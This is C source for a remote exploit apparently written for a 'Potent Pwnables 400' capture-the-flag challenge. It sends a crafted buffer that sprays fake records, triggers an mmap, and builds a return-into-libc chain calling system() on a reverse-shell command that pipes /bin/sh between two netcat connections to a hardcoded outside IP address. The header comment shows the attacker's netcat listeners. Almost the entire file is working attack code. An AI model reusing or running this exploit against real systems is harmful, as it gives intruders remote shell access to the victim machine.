/*
**
** 0x82-sux_pwnage400.c - Potent Pwnables 400 remote exploit by x82
**
** pwnage400 exploit: --
** [x82@x0x x82]$ nc -l -p 8282
** whoami
**
** [x82@x0x x82]$ nc -l -p 8283
** pwnage400
** --
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(int argc,char *argv[]){
 	int index=0;
	unsigned char do_ex[8192];
	char ex_cmd[]="nc 221.154.133.40 8282" /* input */
	    		"|/bin/sh|"
			"nc 221.154.133.40 8283;" /* output */
			"x82x82x82"; /* pad */
	struct hostent *se;
	struct sockaddr_in saddr;
	int sock;
	int i;
	memset((char *)do_ex,0,sizeof(do_ex));

	printf("\nPotent Pwnables 400 remote exploit by x82\n\n");
	
	if(argc<3){
		printf("Usage: %s [host] [port]\n",argv[0]);
		exit(-1);
	}
	se=gethostbyname(argv[1]);
	if(se==NULL){
		return -1;
	}
	sock=socket(AF_INET,SOCK_STREAM,0);
	if(sock==-1){
		return -1;
	}
	saddr.sin_family=AF_INET;
	saddr.sin_port=htons(atoi(argv[2]));
	saddr.sin_addr=*((struct in_addr *)se->h_addr);
	bzero(&(saddr.sin_zero),8);
	
	i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
	if(i==-1){
		return -1;
	}
	
	//sleep(10);
	printf(" [1] make stack frame\n");
	for(index=0,i=0;i<95;i++){
		*(long *)&do_ex[index]=0x00000003; /* type: 3 */
		index+=4;
		*(long *)&do_ex[index]=0x00000000; /* size: 0 */
		index+=4;
		*(long *)&do_ex[index]=0x00000001; /* count: 1 */
		index+=4;
	}
	
	printf(" [2] location: %p, call mmap();\n",0xbfbdf000);
	*(long *)&do_ex[index]=0x00000007; /* type: 7 */
	index+=4;
	
	printf(" [3] input size: %d\n",0x1000);
	*(long *)&do_ex[index]=0x00001000; /* size: 4096 */
	index+=4;
	
//0xbfbdf000:
	*(long *)&do_ex[index]=0x82828282; /* dummy 4byte */
	index+=4;
	
//0xbfbdf004:
	printf(" [4] make reverse connect command\n");
	sprintf(do_ex+index,"%s",ex_cmd);
	index+=strlen(ex_cmd);
	*(long *)&do_ex[index++]=0x00;

	printf(" [5] make return-into-libc code\n");
	for(i=0;i<342;i++){
		*(long *)&do_ex[index]=0x28095b08; /* system() addr */
		index+=4;
		*(long *)&do_ex[index]=0x82828282; /* dummy */
		index+=4;
		*(long *)&do_ex[index]=0xbfbdf004; /* cmd ptr */
		index+=4;
	}
	
	printf(" [6] send exploit.\n");
	write(sock,do_ex,index);

	printf(" [*] 1sec wait plz\n\n");
	sleep(1);
	close(sock);
}

/* eoc */